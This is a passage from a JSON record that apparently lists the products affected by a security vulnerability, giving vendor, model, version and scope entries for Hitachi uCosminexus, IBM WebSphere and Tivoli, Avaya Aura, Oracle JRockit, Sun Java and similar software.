"model": "ucosminexus developer standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.0" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "cosminexus application server 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jrockit r27.1.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "cosminexus studio 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "jrockit r28.1.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "system networking switch center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.31" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.185" }, { "model": "jrockit r27.6.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jrockit r27.6.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "cosminexus primary server base 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.33" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.45" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "ucosminexus developer light 06-70-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "runtimes for java technology 7.sr7", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.01" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jre beta", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus developer professional )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer light 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.4", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0107-10" }, { "model": "cosminexus primary server base 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v07" }, { "model": "jrockit r27.7.6", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "network and security manager software r5", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "network and security manager software r8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-70" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "cosminexus developer professional 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.3" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server standard 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.1" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus application server standard 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "cosminexus developer professional 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "cosminexus developer standard 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "cognos express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jrockit r28.2.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "cosminexus developer standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "cosminexus application server standard 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "java se embedded 7u51", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "cosminexus developer professional 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "espace ivs v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "content collector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cosminexus developer professional 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "system networking switch center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.11" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "runtimes for java technology sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud provisioning fp3 if0001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.21" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.141" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus client 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.13" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "cosminexus client 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "cosminexus studio 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.178" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.145" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura presence services 